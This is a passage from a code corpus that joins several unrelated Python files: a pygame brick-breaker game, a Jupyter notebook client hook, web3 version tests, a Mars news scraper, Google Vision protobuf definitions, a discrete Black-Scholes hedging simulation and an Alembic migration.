elif brick2_collision == collision_required:
self.perform_brick_collision(collision_bricks[1], brick2_collision)
else:
self.perform_brick_collision(collision_bricks[0], collision_required)
def determine_collision_type(self, brick_hit):
"""
description:
- Determine the collision type based on the movement and overlap in the previous frame.
:param brick_hit: Brick-object determine the theoretical collision type for.
:return: CollisionType-enum value
"""
horizontal_movement = self.ball.get_horizontal_movement()
vertical_movement = self.ball.get_vertical_movement()
previously_horizontally_outside = self.check_previously_horizontally_outside(brick_hit.rect,
horizontal_movement)
previously_vertically_outside = self.check_previously_vertically_outside(brick_hit.rect, vertical_movement)
# neither horizontal nor vertical overlap in the previous frame
# --> compare ratio of horizontal and vertical overlap in the current frame
if previously_horizontally_outside and previously_vertically_outside:
horizontal_delta = (self.ball.form.right - brick_hit.rect.left) if horizontal_movement == Movement.RIGHT \
else (brick_hit.rect.right - self.ball.form.left)
vertical_delta = (self.ball.form.bottom - brick_hit.rect.top) if vertical_movement == Movement.DOWN \
else (brick_hit.rect.bottom - self.ball.form.top)
if horizontal_delta > vertical_delta:
return CollisionType.HORIZONTAL
else:
return CollisionType.VERTICAL
# horizontal overlap but no vertical overlap in the previous frame --> vertical collision
elif previously_horizontally_outside and not previously_vertically_outside:
return CollisionType.VERTICAL
# no horizontal overlap but vertical overlap in the previous frame --> horizontal collision
elif not previously_horizontally_outside and previously_vertically_outside:
return CollisionType.HORIZONTAL
# horizontal overlap and vertical overlap in the previous frame
# --> irrelevant here because collision would have already happended and been handled in the previous frame.
def perform_brick_collision(self, brick_hit, collision_type):
"""
description:
- Call function to change ball's movement direction based on the collision_type.
- Call Brick's get_hit() function.
- Destroy brick, increase score if brick was destroyed and create a special with a certain probability.
:param brick_hit: Brick-object to perform the collision with
:param collision_type: CollisionType-Enum
:return: nothing
"""
if collision_type == CollisionType.HORIZONTAL:
self.ball.collide_horizontal()
else:
self.ball.collide_vertical()
if brick_hit.get_hit():
self.bricks.remove(brick_hit)
self.player.score += 1
if to_drop_special():
spcl = choose_random_special()
txt = spcl.get_german_name()
self.spcl_text = SpecialText(txt, self.clock_speed)
self.present_specials.append(Special(brick_hit.rect.topleft, spcl))
def check_special_collisions(self):
"""
description:
- Check if any specials, i.e. special.rect, currently present on the screen is caught with the paddle.
- To be caught the special has to be completely within the paddle's horizontal width and the paddle's
height.
- Remove active special if new special is caught.
- Activate special on self or paddle based on its type.
- Remove the special from the currently present specials and set self.active special.
- If special is off screen, remove it.
:return: nothing
"""
if len(self.present_specials) > 0:
for special in self.present_specials:
if (self.paddle.get_top_edge() < special.rect.bottom <= self.paddle.get_bottom_edge()) \
and self.paddle.get_left_edge() <= special.rect.left \
and self.paddle.get_right_edge() >= special.rect.right:
if not (self.active_special is None):
self.remove_special()
if special.is_paddle_special():
self.paddle.activate_special(special)
else:
self.activate_special(special)
self.present_specials.remove(special)
self.active_special = special
self.active_special.activate(self.clock_speed)
elif special.rect.top > DISPLAY_HEIGHT:
self.present_specials.remove(special)
def activate_special(self, special):
"""
description:
- Activate a caught non-paddle special.
- Either add a bonus life or adjust clock speed based on special.type
:param special: the caught special
:return: nothing
"""
if special.special_type == SpecialType.BONUS_LIFE:
self.player.lives += 1
elif special.special_type == SpecialType.FASTER:
self.clock_speed = DEFAULT_CLOCK_SPEED * CLOCK_SPEED_CHANGE_FACTOR
elif special.special_type == SpecialType.SLOWER:
self.clock_speed = DEFAULT_CLOCK_SPEED / CLOCK_SPEED_CHANGE_FACTOR
def remove_special(self):
"""
description:
- Remove the currently active special and negate its effect.
- If is_paddle_special: remove special from pedal
- else: reset self.clock_speed
:return: nothing
"""
if self.active_special.is_paddle_special():
self.paddle.remove_special()
else:
self.clock_speed = DEFAULT_CLOCK_SPEED
self.active_special = None
def draw_all(self):
"""
description:
- Called every tick
- draws screen with every element
:return:
"""
self.screen.fill(BLUE)
for brick in self.bricks:
brick.show_brick(self.screen)
for paddle_part in self.paddle.hitzones:
pygame.draw.rect(self.screen, WHITE, paddle_part[0])
for triangle in self.paddle.triangle_views:
pygame.draw.polygon(self.screen, WHITE, triangle)
for special in self.present_specials:
special.fall()
special.show_special(self.screen)
self.player.draw_lives(self.screen)
pygame.draw.rect(self.screen, WHITE, self.ball.form)
self.screen.blit(self.font.render(str(self.player.score), -1, WHITE), (400, 550))
self.draw_spcl_txt()
def draw_spcl_txt(self):
"""
description:
- Write the type of the special that just dropped to the top of the screen.
:return: nothing
"""
if self.spcl_text is not None:
info = TextElement(
center_position=(590, 10),
font_size=16,
bg_rgb=BLUE,
text_rgb=WHITE,
text=f"Spezial: {self.spcl_text.text} aufgetaucht",
)
elems = RenderUpdates(info)
elems.draw(self.screen)
if self.spcl_text.tick():
self.spcl_text = None
def level_completed(self):
"""
description:
- Called when the player completes a level.
- If level 10 was completed: show Highscore Page
- Else: increase level, add bonus life
:return:
"""
if self.player.current_level == 10:
highscore(self.screen, self.player.score)
return GameState.TITLE
else:
self.player.current_level += 1
self.player.lives += 1
self.start_game()
def pause_elems(self):
"""
description:
- Creates the Text object when being in pause mode
:return: elements to be drawn during pause mode
"""
dbi = DatabaseInteract()
sets = dbi.get_settings()
heading = TextElement(
center_position=(400, 400),
font_size=18,
bg_rgb=BLUE,
text_rgb=WHITE,
text=f"Spiel Pausiert, zum Fortsetzen '{sets[5]}' drücken, zum Beenden 'ESC' drücken ",
)
elems = RenderUpdates(heading)
return elems
def draw_start_text(self):
"""
description:
- Creates and draws the Text object when being in pause mode
:return: nothing
"""
dbi = DatabaseInteract()
sets = dbi.get_settings()
key_left = sets[1]
key_right = sets[3]
key_shoot = sets[8]
heading1 = TextElement(
center_position=(400, 400),
font_size=18,
bg_rgb=BLUE,
text_rgb=WHITE,
text=f"Startwinkel mit '{key_left}' und '{key_right}' auswählen",
)
heading2 = TextElement(
center_position=(400, 450),
font_size=18,
bg_rgb=BLUE,
text_rgb=WHITE,
text=f"Mit '{key_shoot}' Ball abschiessen, zum Beenden 'ESC' drücken ",
)
elems = RenderUpdates(heading1,heading2)
elems.draw(self.screen)
def main(self):
"""
description:
- Contains game logic.
- Process game events by calling corresponding functions.
- Update the UI.
- Check whether level was completed.
:return: nothing
"""
clock = pygame.time.Clock()
self.start_game()
dbi = DatabaseInteract()
sets = dbi.get_settings()
key_left = sets[2]
key_right = sets[4]
pause_key = sets[6]
while True:
clock.tick(self.clock_speed)
for event in pygame.event.get():
if event.type == QUIT:
os._exit(1)
if event.type == pygame.KEYDOWN:
if event.key == int(pause_key):
elems = self.pause_elems()
game_paused = True
while game_paused:
elems.draw(self.screen)
events = pygame.event.get()
for event in events:
if event.type == QUIT:
os._exit(1)
if event.type == pygame.KEYDOWN:
if event.key == int(pause_key):
game_paused = False
break
elif event.key == pygame.K_ESCAPE:
return GameState.TITLE
pygame.display.update()
keys = pygame.key.get_pressed()
if keys[int(key_left)]:
self.paddle.move(-1)
if keys[int(key_right)]:
self.paddle.move(1)
if keys[pygame.K_ESCAPE]:
return GameState.TITLE
# update ball
self.ball.move()
self.check_ball_collisions()
# update specials
if not (self.active_special is None):
if self.active_special.tick():
self.remove_special()
self.check_special_collisions()
# Update screen
self.draw_all()
pygame.display.flip()
if len(self.bricks) == self.number_unbreakable_bricks:
if self.level_completed() == GameState.TITLE:
return GameState.TITLE
|
the-stack_0_12299 | import asyncio
import typing as t
from contextlib import asynccontextmanager
from nbclient import NotebookClient
from nbformat import NotebookNode
from nbclient.exceptions import CellExecutionComplete, DeadKernelError, CellControlSignal
from nbclient.util import run_hook
from appyter.ext.asyncio.event_loop import get_event_loop
from appyter.ext.asyncio.helpers import ensure_async
class NotebookClientIOPubHook(NotebookClient):
''' A notebook client with the ability to hook into iopub updates
'''
def __init__(self, *args, iopub_hook=None, **kwargs):
super().__init__(*args, **kwargs)
self.iopub_hook = iopub_hook
async def _async_poll_output_msg(
self,
parent_msg_id,
cell,
cell_index
):
assert self.kc is not None
complete = False
while not complete:
msg = await ensure_async(self.kc.iopub_channel.get_msg(timeout=None))
if msg['parent_header'].get('msg_id') == parent_msg_id:
try:
# Will raise CellExecutionComplete when completed
self.process_message(msg, cell, cell_index)
except CellExecutionComplete:
complete = True
finally:
if self.iopub_hook is not None:
await self.iopub_hook(cell, cell_index)
def _kc_execute(self, *args, **kwargs):
return self.kc.execute(*args, **kwargs)
async def async_execute_cell(
self,
cell: NotebookNode,
cell_index: int,
execution_count: t.Optional[int] = None,
store_history: bool = True) -> NotebookNode:
"""
Executes a single code cell.
To execute all cells see :meth:`execute`.
Parameters
----------
cell : nbformat.NotebookNode
The cell which is currently being processed.
cell_index : int
The position of the cell within the notebook object.
execution_count : int
The execution count to be assigned to the cell (default: Use kernel response)
store_history : bool
Determines if history should be stored in the kernel (default: False).
Specific to ipython kernels, which can store command histories.
Returns
-------
output : dict
The execution output payload (or None for no output).
Raises
------
CellExecutionError
If execution failed and should raise an exception, this will be raised
with defaults about the failure.
Returns
-------
cell : NotebookNode
The cell which was just processed.
"""
assert self.kc is not None
if cell.cell_type != 'code' or not cell.source.strip():
self.log.debug("Skipping non-executing cell %s", cell_index)
return cell
if self.record_timing and 'execution' not in cell['metadata']:
cell['metadata']['execution'] = {}
self.log.debug("Executing cell:\n%s", cell.source)
parent_msg_id = await ensure_async(self._kc_execute)(
cell.source,
store_history=store_history,
stop_on_error=not self.allow_errors
)
# We launched a code cell to execute
self.code_cells_executed += 1
exec_timeout = self._get_timeout(cell)
cell.outputs = []
self.clear_before_next_output = False
task_poll_kernel_alive = asyncio.ensure_future(
self._async_poll_kernel_alive()
)
task_poll_output_msg = asyncio.ensure_future(
self._async_poll_output_msg(parent_msg_id, cell, cell_index)
)
self.task_poll_for_reply = asyncio.ensure_future(
self._async_poll_for_reply(
parent_msg_id, cell, exec_timeout, task_poll_output_msg, task_poll_kernel_alive
)
)
try:
exec_reply = await self.task_poll_for_reply
except asyncio.CancelledError:
# can only be cancelled by task_poll_kernel_alive when the kernel is dead
task_poll_output_msg.cancel()
raise DeadKernelError("Kernel died")
except Exception as e:
# Best effort to cancel request if it hasn't been resolved
try:
# Check if the task_poll_output is doing the raising for us
if not isinstance(e, CellControlSignal):
task_poll_output_msg.cancel()
finally:
raise
if execution_count:
cell['execution_count'] = execution_count
await self._check_raise_for_error(cell, cell_index, exec_reply)
self.nb['cells'][cell_index] = cell
return cell
@asynccontextmanager
async def async_setup_kernel(self, **kwargs) -> t.AsyncGenerator:
"""
Context manager for setting up the kernel to execute a notebook.
This assigns the Kernel Manager (``self.km``) if missing and Kernel Client(``self.kc``).
When control returns from the yield it stops the client's zmq channels, and shuts
down the kernel.
"""
# by default, cleanup the kernel client if we own the kernel manager
# and keep it alive if we don't
cleanup_kc = kwargs.pop('cleanup_kc', self.owns_km)
if self.km is None:
self.km = self.create_kernel_manager()
loop = get_event_loop()
if not self.km.has_kernel:
await self.async_start_new_kernel(**kwargs)
await self.async_start_new_kernel_client()
try:
yield
except RuntimeError as e:
await run_hook(self.on_notebook_error, notebook=self.nb)
raise e
finally:
if cleanup_kc:
await self._async_cleanup_kernel()
await run_hook(self.on_notebook_complete, notebook=self.nb)
|
the-stack_0_12300 | import pytest
from newchain_web3 import (
EthereumTesterProvider,
Web3,
)
from newchain_web3.providers.eth_tester.main import (
AsyncEthereumTesterProvider,
)
from newchain_web3.version import (
AsyncVersion,
BlockingVersion,
Version,
)
@pytest.fixture
def blocking_w3():
return Web3(
EthereumTesterProvider(),
modules={
'blocking_version': BlockingVersion,
'legacy_version': Version
})
@pytest.fixture
def async_w3():
return Web3(
AsyncEthereumTesterProvider(),
middlewares=[],
modules={
'async_version': AsyncVersion,
})
def test_blocking_version(blocking_w3):
assert blocking_w3.blocking_version.api == blocking_w3.legacy_version.api
assert blocking_w3.blocking_version.node == blocking_w3.legacy_version.node
assert blocking_w3.blocking_version.ethereum == blocking_w3.legacy_version.ethereum
@pytest.mark.asyncio
async def test_async_blocking_version(async_w3, blocking_w3):
assert async_w3.async_version.api == blocking_w3.legacy_version.api
assert await async_w3.async_version.node == blocking_w3.legacy_version.node
with pytest.raises(
ValueError,
message="RPC Endpoint has not been implemented: eth_protocolVersion"
):
assert await async_w3.async_version.ethereum == blocking_w3.legacy_version.ethereum
|
the-stack_0_12301 | #imports
from splinter import Browser
from bs4 import BeautifulSoup as soup
from webdriver_manager.chrome import ChromeDriverManager
import datetime as dt
#scrape all function
def scrape_all():
# need to return a json that has data to load into database (MongoDB)
# Set up Splinter
executable_path = {'executable_path': ChromeDriverManager().install()}
browser = Browser('chrome', **executable_path, headless=False)
# get datta from news page #2add variables for news title and paragraph
news_title, news_paragraph = scrape_news(browser)
# then add info to dictionary
marsData = {
"newsTitle": news_title,
"newsParagraph": news_paragraph,
"featuredImage": scrape_images(browser),
"facts": scrape_facts(browser),
"hemispheres": scrape_hemisphere_pages(browser),
"lastUpdated": dt.datetime.now()
}
#stop webdriver
browser.quit()
return marsData
#scrape the mars news page
def scrape_news(browser):
# Visit the Mars news site
url = 'https://redplanetscience.com/'
browser.visit(url)
# Optional delay for loading the page
browser.is_element_present_by_css('div.list_text', wait_time=1)
# Convert the browser html to a soup object
html = browser.html
news_soup = soup(html, 'html.parser')
slide_elem = news_soup.select_one('div.list_text')
#get title
news_title = slide_elem.find('div', class_='content_title').get_text()
#get paragraph
news_p= slide_elem.find('div', class_='article_teaser_body').get_text()
#return title and para
return news_title, news_p
#scrape through the feature image page
def scrape_images(browser):
#vist imagges page
featured_image_url = 'https://spaceimages-mars.com'
browser.visit(featured_image_url)
# Find and click the full image button
full_image_link = browser.find_by_tag('button')[1]
full_image_link.click()
#parsing through with soup
html = browser.html
img_soup = soup(html, 'html.parser')
#locating mars image
img_url_rel = img_soup.find('img', class_='fancybox-image').get('src')
# Use the base url to create an absolute url
img_url = f'https://spaceimages-mars.com/{img_url_rel}'
return img_url
#scrape through facts page to get table
#grabbing the html code
def scrape_facts(browser):
facts_url = 'https://galaxyfacts-mars.com/'
browser.visit(facts_url)
html = browser.html
fact_soup = soup(html, 'html.parser')
#locating facts
facts_loc = fact_soup.find('div', class_="diagram mt-4")
fact_table = facts_loc.find('table') #getting html for fact table
facts = ""
#add text to facts
facts += str(fact_table)
return facts
#scrape hemisphere pages
def scrape_hemisphere_pages(browser):
hemi_url = 'https://marshemispheres.com/'
browser.visit(hemi_url)
# Create a list to hold the images and titles.
hemisphere_image_urls = []
# Get a list of all of the hemispheres
#links = browser.find_by_css('a.product-item img')
# Next, loop through those links, click the link, find the sample anchor, return the href
for i in range(4):
#make a dictionary for hemisphere
hemisphereInfo = {}
# We have to find the elements on each loop to avoid a stale element exception
browser.find_by_css('a.product-item img')[i].click()
# Next, we find the Sample image anchor tag and extract the href
sample = browser.links.find_by_text('Sample').first
hemisphereInfo["img_url"] = sample['href']
# Get Hemisphere title
hemisphereInfo['title'] = browser.find_by_css('h2.title').text
# Append hemisphere object to list
hemisphere_image_urls.append(hemisphereInfo)
# Finally, we navigate backwards
browser.back()
return hemisphere_image_urls
#run script
if __name__ == "__main__":
print(scrape_all()) |
the-stack_0_12303 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.cloud.vision.v1p2beta1", manifest={"WebDetection",},
)
class WebDetection(proto.Message):
r"""Relevant information for the image from the Internet.
Attributes:
web_entities (Sequence[~.web_detection.WebDetection.WebEntity]):
Deduced entities from similar images on the
Internet.
full_matching_images (Sequence[~.web_detection.WebDetection.WebImage]):
Fully matching images from the Internet.
Can include resized copies of the query image.
partial_matching_images (Sequence[~.web_detection.WebDetection.WebImage]):
Partial matching images from the Internet.
Those images are similar enough to share some
key-point features. For example an original
image will likely have partial matching for its
crops.
pages_with_matching_images (Sequence[~.web_detection.WebDetection.WebPage]):
Web pages containing the matching images from
the Internet.
visually_similar_images (Sequence[~.web_detection.WebDetection.WebImage]):
The visually similar image results.
best_guess_labels (Sequence[~.web_detection.WebDetection.WebLabel]):
Best guess text labels for the request image.
"""
class WebEntity(proto.Message):
r"""Entity deduced from similar images on the Internet.
Attributes:
entity_id (str):
Opaque entity ID.
score (float):
Overall relevancy score for the entity.
Not normalized and not comparable across
different image queries.
description (str):
Canonical description of the entity, in
English.
"""
entity_id = proto.Field(proto.STRING, number=1)
score = proto.Field(proto.FLOAT, number=2)
description = proto.Field(proto.STRING, number=3)
class WebImage(proto.Message):
r"""Metadata for online images.
Attributes:
url (str):
The result image URL.
score (float):
(Deprecated) Overall relevancy score for the
image.
"""
url = proto.Field(proto.STRING, number=1)
score = proto.Field(proto.FLOAT, number=2)
class WebPage(proto.Message):
r"""Metadata for web pages.
Attributes:
url (str):
The result web page URL.
score (float):
(Deprecated) Overall relevancy score for the
web page.
page_title (str):
Title for the web page, may contain HTML
markups.
full_matching_images (Sequence[~.web_detection.WebDetection.WebImage]):
Fully matching images on the page.
Can include resized copies of the query image.
partial_matching_images (Sequence[~.web_detection.WebDetection.WebImage]):
Partial matching images on the page.
Those images are similar enough to share some
key-point features. For example an original
image will likely have partial matching for its
crops.
"""
url = proto.Field(proto.STRING, number=1)
score = proto.Field(proto.FLOAT, number=2)
page_title = proto.Field(proto.STRING, number=3)
full_matching_images = proto.RepeatedField(
proto.MESSAGE, number=4, message="WebDetection.WebImage",
)
partial_matching_images = proto.RepeatedField(
proto.MESSAGE, number=5, message="WebDetection.WebImage",
)
class WebLabel(proto.Message):
r"""Label to provide extra metadata for the web detection.
Attributes:
label (str):
Label for extra metadata.
language_code (str):
The BCP-47 language code for ``label``, such as "en-US" or
"sr-Latn". For more information, see
http://www.unicode.org/reports/tr35/#Unicode_locale_identifier.
"""
label = proto.Field(proto.STRING, number=1)
language_code = proto.Field(proto.STRING, number=2)
web_entities = proto.RepeatedField(proto.MESSAGE, number=1, message=WebEntity,)
full_matching_images = proto.RepeatedField(
proto.MESSAGE, number=2, message=WebImage,
)
partial_matching_images = proto.RepeatedField(
proto.MESSAGE, number=3, message=WebImage,
)
pages_with_matching_images = proto.RepeatedField(
proto.MESSAGE, number=4, message=WebPage,
)
visually_similar_images = proto.RepeatedField(
proto.MESSAGE, number=6, message=WebImage,
)
best_guess_labels = proto.RepeatedField(proto.MESSAGE, number=8, message=WebLabel,)
__all__ = tuple(sorted(__protobuf__.manifest))
|
the-stack_0_12304 | import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import norm
import time
import bspline
import bspline.splinelab as splinelab
# The Black-Scholes prices
def bs_put(t, S0, K, r, sigma, T):
d1 = (np.log(S0 / K) + (r + 1 / 2 * sigma ** 2) * (T - t)) / sigma / np.sqrt(T - t)
d2 = (np.log(S0 / K) + (r - 1 / 2 * sigma ** 2) * (T - t)) / sigma / np.sqrt(T - t)
price = K * np.exp(-r * (T - t)) * norm.cdf(-d2) - S0 * norm.cdf(-d1)
return price
def bs_call(t, S0, K, r, sigma, T):
d1 = (np.log(S0 / K) + (r + 1 / 2 * sigma ** 2) * (T - t)) / sigma / np.sqrt(T - t)
d2 = (np.log(S0 / K) + (r - 1 / 2 * sigma ** 2) * (T - t)) / sigma / np.sqrt(T - t)
price = S0 * norm.cdf(d1) - K * np.exp(-r * (T - t)) * norm.cdf(d2)
return price
def d1(S0, K, r, sigma, T):
return (np.log(S0 / K) + (r + sigma ** 2 / 2) * T) / (sigma * np.sqrt(T))
def d2(S0, K, r, sigma, T):
return (np.log(S0 / K) + (r - sigma ** 2 / 2) * T) / (sigma * np.sqrt(T))
class DiscreteBlackScholes:
"""
Class implementing discrete Black Scholes
DiscreteBlackScholes is class for pricing and hedging under
the real-world measure for a one-dimensional Black-Scholes setting
"""
def __init__(self,
s0,
strike,
vol,
T,
r,
mu,
numSteps,
numPaths):
"""
:param s0: initial price of the underlying
:param strike: option strike
:param vol: volatility
:param T: time to maturity, in years
:param r: risk-free rate,
:param mu: real drift, asset drift
:param numSteps: number of time steps
:param numPaths: number of Monte Carlo paths
"""
self.s0 = s0
self.strike = strike
self.vol = vol
self.T = T
self.r = r
self.mu = mu
self.numSteps = numSteps
self.numPaths = numPaths
self.dt = self.T / self.numSteps # time step
self.gamma = np.exp(-r * self.dt) # discount factor for one time step, i.e. gamma in the QLBS paper
self.sVals = np.zeros((self.numPaths, self.numSteps + 1), 'float') # matrix of stock values
# initialize half of the paths with stock price values ranging from 0.5 to 1.5 of s0
# the other half of the paths start with s0
half_paths = int(numPaths / 2)
if False:
# Grau (2010) "Applications of Least-Squares Regressions to Pricing and Hedging of Financial Derivatives"
self.sVals[:, 0] = (np.hstack((np.linspace(0.5 * s0, 1.5 * s0, half_paths),
s0 * np.ones(half_paths, 'float')))).T
self.sVals[:, 0] = s0 * np.ones(numPaths, 'float')
self.optionVals = np.zeros((self.numPaths, self.numSteps + 1), 'float') # matrix of option values
self.intrinsicVals = np.zeros((self.numPaths, self.numSteps + 1), 'float')
self.bVals = np.zeros((self.numPaths, self.numSteps + 1), 'float') # matrix of cash position values
self.opt_hedge = np.zeros((self.numPaths, self.numSteps + 1),
'float') # matrix of optimal hedges calculated from cross-sectional information F_t
self.X = None
self.data = None # matrix of features, i.e. self.X as sum of basis functions
self.delta_S_hat = None
# coef = 1.0/(2 * gamma * risk_lambda)
# override it by zero to have pure risk hedge
self.coef = 0.
def gen_paths(self):
"""
A simplest path generator
"""
np.random.seed(42)
# Spline basis of order p on knots k
z = np.random.normal(0, 1, size=(self.numSteps + 1, self.numPaths)).T
for t in range(self.numSteps):
self.sVals[:, t + 1] = self.sVals[:, t] * np.exp(
(self.mu - 0.5 * self.vol ** 2) * self.dt + (self.vol * np.sqrt(self.dt) * z[:, t + 1]))
print(self.sVals)
# like in QLBS
delta_S = self.sVals[:, 1:] - np.exp(self.r * self.dt) * self.sVals[:, :self.numSteps]
self.delta_S_hat = np.apply_along_axis(lambda x: x - np.mean(x), axis=0, arr=delta_S)
# state variable
# delta_t here is due to their conventions
self.X = - (self.mu - 0.5 * self.vol ** 2) * np.arange(self.numSteps + 1) * self.dt + np.log(self.sVals)
X_min = np.min(np.min(self.X))
X_max = np.max(np.max(self.X))
print('X.shape = ', self.X.shape)
print('X_min, X_max = ', X_min, X_max)
p = 4 # order of spline (as-is; 3 = cubic, 4: B-spline?)
ncolloc = 12
tau = np.linspace(X_min, X_max, ncolloc) # These are the sites to which we would like to interpolate
# k is a knot vector that adds endpoints repeats as appropriate for a spline of order p
# To get meaningful results, one should have ncolloc >= p+1
k = splinelab.aptknt(tau, p)
basis = bspline.Bspline(k, p)
num_basis = ncolloc # len(k) #
self.data = np.zeros((self.numSteps + 1, self.numPaths, num_basis))
print('num_basis = ', num_basis)
print('dim self.data = ', self.data.shape)
# fill it, expand function in finite dimensional space
# in neural network the basis is the neural network itself
t_0 = time.time()
for ix in np.arange(self.numSteps + 1):
x = self.X[:, ix]
self.data[ix, :, :] = np.array([basis(el) for el in x])
t_end = time.time()
print('\nTime Cost of basis expansion:', t_end - t_0, 'seconds')
def function_A_vec(self, t, reg_param=1e-3):
"""
function_A_vec - compute the matrix A_{nm} from Eq. (52) (with a regularization!)
Eq. (52) in QLBS Q-Learner in the Black-Scholes-Merton article
Arguments:
t - time index, a scalar, an index into time axis of data_mat
reg_param - a scalar, regularization parameter
Return:
- np.array, i.e. matrix A_{nm} of dimension num_basis x num_basis
"""
X_mat = self.data[t, :, :]
num_basis_funcs = X_mat.shape[1]
this_dS = self.delta_S_hat[:, t]
hat_dS2 = (this_dS ** 2).reshape(-1, 1)
A_mat = np.dot(X_mat.T, X_mat * hat_dS2) + reg_param * np.eye(num_basis_funcs)
return A_mat
def function_B_vec(self, t, Pi_hat):
"""
function_B_vec - compute vector B_{n} from Eq. (52) QLBS Q-Learner in the Black-Scholes-Merton article
Arguments:
t - time index, a scalar, an index into time axis of delta_S_hat
Pi_hat - pandas.DataFrame of dimension N_MC x T of portfolio values
Return:
B_vec - np.array() of dimension num_basis x 1
"""
tmp = Pi_hat * self.delta_S_hat[:, t] + self.coef * (np.exp((self.mu - self.r) * self.dt)) * self.sVals[:, t]
X_mat = self.data[t, :, :] # matrix of dimension N_MC x num_basis
B_vec = np.dot(X_mat.T, tmp)
return B_vec
def seed_intrinsic(self, strike=None, cp='P'):
"""
initilaize option value and intrinsic value for each node
"""
if strike is not None:
self.strike = strike
if cp == 'P':
# payoff function at maturity T: max(K - S(T),0) for all paths
self.optionVals = np.maximum(self.strike - self.sVals[:, -1], 0).copy()
# payoff function for all paths, at all time slices
self.intrinsicVals = np.maximum(self.strike - self.sVals, 0).copy()
elif cp == 'C':
# payoff function at maturity T: max(S(T) -K,0) for all paths
self.optionVals = np.maximum(self.sVals[:, -1] - self.strike, 0).copy()
# payoff function for all paths, at all time slices
self.intrinsicVals = np.maximum(self.sVals - self.strike, 0).copy()
else:
raise Exception('Invalid parameter: %s' % cp)
self.bVals[:, -1] = self.intrinsicVals[:, -1]
def roll_backward(self):
"""
Roll the price and optimal hedge back in time starting from maturity
"""
for t in range(self.numSteps - 1, -1, -1):
# determine the expected portfolio value at the next time node
piNext = self.bVals[:, t + 1] + self.opt_hedge[:, t + 1] * self.sVals[:, t + 1]
pi_hat = piNext - np.mean(piNext)
A_mat = self.function_A_vec(t)
B_vec = self.function_B_vec(t, pi_hat)
phi = np.dot(np.linalg.inv(A_mat), B_vec)
self.opt_hedge[:, t] = np.dot(self.data[t, :, :], phi)
self.bVals[:, t] = np.exp(-self.r * self.dt) * (
self.bVals[:, t + 1] + (self.opt_hedge[:, t + 1] - self.opt_hedge[:, t]) * self.sVals[:, t + 1])
# calculate the initial portfolio value
initPortfolioVal = self.bVals[:, 0] + self.opt_hedge[:, 0] * self.sVals[:, 0]
# use only the second half of the paths generated with paths starting from S0
optionVal = np.mean(initPortfolioVal)
optionValVar = np.std(initPortfolioVal)
delta = np.mean(self.opt_hedge[:, 0])
return optionVal, delta, optionValVar
if __name__ == "__main__":
np.random.seed(42)
strike_k = 95
test_vol = 0.2
test_mu = 0.03
dt = 0.01
rfr = 0.05
num_paths = 100
num_periods = 252
hMC = DiscreteBlackScholes(100, strike_k, test_vol, 1., rfr, test_mu, num_periods, num_paths)
hMC.gen_paths()
t = hMC.numSteps - 1
piNext = hMC.bVals[:, t+1] + 0.1 * hMC.sVals[:, t+1]
pi_hat = piNext - np.mean(piNext)
A_mat = hMC.function_A_vec(t)
B_vec = hMC.function_B_vec(t, pi_hat)
phi = np.dot(np.linalg.inv(A_mat), B_vec)
opt_hedge = np.dot(hMC.data[t, :, :], phi)
# plot the results
fig = plt.figure(figsize=(12,4))
ax1 = fig.add_subplot(121)
ax1.scatter(hMC.sVals[:,t], pi_hat)
ax1.set_title(r'Expected $\Pi_0$ vs. $S_t$')
ax1.set_xlabel(r'$S_t$')
ax1.set_ylabel(r'$\Pi_0$')
# input parameters
s0 = 100.0
strike = 100.0
r = 0.05
mu = 0.07 # 0.05
vol = 0.4
T = 1.0
# Simulation Parameters
numPaths = 50000 # number of Monte Carlo trials
numSteps = 6
# create the class object
hMC = DiscreteBlackScholes(s0, strike, vol, T, r, mu, numSteps, numPaths)
# calculation
hMC.gen_paths()
hMC.seed_intrinsic()
option_val, delta, option_val_variance = hMC.roll_backward()
bs_call_value = bs_put(0, s0, K=strike, r=r, sigma=vol, T=T)
print('Option value = ', option_val)
print('Option value variance = ', option_val_variance)
print('Option delta = ', delta)
print('BS value', bs_call_value)
strikes = np.linspace(85, 110, 6)
results = [None] * len(strikes)
bs_prices = np.zeros(len(strikes))
bs_deltas = np.zeros(len(strikes))
numPaths = 50000
hMC = DiscreteBlackScholes(s0, strike, vol, T, r, mu, numSteps, numPaths)
hMC.gen_paths()
for ix, k_strike in enumerate(strikes):
hMC.seed_intrinsic(k_strike)
results[ix] = hMC.roll_backward()
bs_prices[ix] = bs_put(0, s0, K=k_strike, r=r, sigma=vol, T=T)
bs_deltas[ix] = norm.cdf(d1(s0, K=k_strike, r=r, sigma=vol, T=T)) - 1
print("BS price: ", bs_prices)
mc_prices = np.array([x[0] for x in results])
mc_deltas = np.array([x[1] for x in results])
price_variances = np.array([x[-1] for x in results])
prices_diff = mc_prices - bs_prices
deltas_diff = mc_deltas - bs_deltas
print("Price variances: ", price_variances)
|
the-stack_0_12305 | """empty message
Revision ID: 3ca97c203761
Revises: ddc9ab150f3e
Create Date: 2021-05-11 14:59:39.803671
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '3ca97c203761'
down_revision = 'ddc9ab150f3e'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('category',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=50), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_table('post',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('category_id', sa.Integer(), nullable=True),
sa.Column('author_id', sa.Integer(), nullable=True),
sa.Column('title', sa.String(length=80), nullable=True),
sa.Column('body', sa.Text(), nullable=True),
sa.Column('image', sa.String(length=36), nullable=True),
sa.Column('slug', sa.String(length=255), nullable=True),
sa.Column('publish_date', sa.DateTime(), nullable=True),
sa.Column('live', sa.Boolean(), nullable=True),
sa.ForeignKeyConstraint(['author_id'], ['author.id'], ),
sa.ForeignKeyConstraint(['category_id'], ['category.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('slug')
)
# ### end Alembic commands ###
def downgrade():
